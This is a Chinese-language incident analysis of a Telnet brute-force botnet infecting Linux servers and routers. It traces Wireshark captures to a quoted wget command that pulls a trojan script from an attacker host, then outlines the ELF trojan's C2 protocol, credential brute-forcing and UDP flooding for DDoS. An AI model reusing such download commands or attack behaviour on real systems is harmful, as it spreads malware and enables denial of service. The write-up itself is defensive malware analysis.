Author:Mr.Right、Gongmo
申明:文中提到的攻擊方式僅為曝光、打擊惡意網絡攻擊行為,切勿模仿,否則后果自負。
路由器木馬,其主要目標是控制網絡的核心路由設備;一旦攻擊成功,其危害性遠大于一臺主機被控。
如果僅僅在路由器上面防范該類木馬,那也是不夠的,有很多Linux服務器違規開放Telnet端口,且使用了弱口令,一樣可以中招。下面我們就一起來回顧一起真實案例。
在對客戶某服務器區域進行安全監測時發現某服務器通信流量存在大量Telnet協議。截取一段數據,進行協議統計:
Telnet協議一般為路由器管理協議,服務器中存在此協議可初步判斷為異常流量。繼續進行端口、IP走向統計:發現大量外部IP通過Tcp23端口(Telnet)連接該服務器。
此統計可說明:
挑選通信量較大的IP,篩選通信雙向數據:
查看Telnet數據,發現已經成功連接該服務器。
數據中還存在大量Telnet掃描探測、暴力破解攻擊,在此不再詳述。
為進一步查看Telnet通信內容,Follow TcpStream。
將內容復制粘貼至文本編輯器:
發現一段自動下載命令:
#!bash
wget http://208.67.1.42/bin.sh;
wget1 http://208.67.1.42/bin2.sh。
連接http://208.67.1.42/bin.sh可發現該腳本文件內容為自動下載獲取木馬,且木馬可感染ARM、MIPS、X86、PowerPC等架構的設備。
(注:本章節不屬于Wireshark分析范疇,本文僅以jackmyx86分析為例)
該木馬文件是ELF格式的,影響的操作系統包括:
從上圖中判斷木馬下載的類型分別是:Mipsel,misp,x86(其實這個是x64),arm,x86(i586,i686)等。
從截獲的*.sh文件看,*.sh腳本想刪除這些目錄和內容,并且關閉一些進程。
首先得到了一個”Art of war”的字符串(看來黑客是個文藝青年)。
接著嘗試打開路由器配置文件。
在配置文件里查找字符串00000000,如果找到就直接填充0;
在初始化函數中:嘗試建立socket連接,連接地址為:208.67.1.194:164。
嘗試連接服務器,等待遠端服務器應答。
服務器發送“ping”命令后,客戶端返回“pong”表示已經連接成功。當發送“GETLOCALIP”后,返回控制端的本機IP。當服務器發送SCANNER后,根據ON或者OFF來控制是否要掃描指定IP,進行暴力破解。當發送“UDP”命令時候,向指定的IP地址發送大量UDP無效數據包。
下圖是木馬嘗試獲得路由器的用戶名和密碼匹配,企圖暴力破解賬戶和密碼。
在被控制之后,跟隨服務器指定的IP,發送大量隨機生成的長度為0x400的字符串數據,進行DDOS攻擊。下圖是發送垃圾數據,進行DDOS攻擊。
隨機數據生成的偽代碼如下:
根據網址追溯到攻擊者的網頁和twitter賬號。
